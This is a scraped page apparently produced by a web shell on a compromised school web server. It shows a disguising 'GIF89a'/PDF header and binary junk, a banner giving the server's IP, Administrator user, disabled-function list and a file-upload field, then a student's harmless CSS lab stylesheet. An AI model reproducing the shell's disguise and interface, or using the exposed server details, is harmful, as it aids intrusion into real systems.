GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab08/ |
Upload File : |
@charset "utf-8"; /* Lab 8 External Style Sheet - Jim Martinson */ /* 2.3.1 */ h1 { background-color: lightgreen; } /* 2.3.2 */ #description { border: 1px solid deeppink; color: crimson; } /* 2.3.3 */ .property { border: 5px dotted darkgray; width: 300px; } /* 2.3.4 */ div.property { border: 3px groove darkgreen; margin: 0 auto; } /* 2.3.5 */ a[target] { background-color: lightblue; } /* 2.3.6 */ p em { color: red; } /* 2.3.7 */ ::first-letter { font-size: 1.5em; font-weight: bold; } /* 2.3.8 */ h1, div { color: darkgreen; }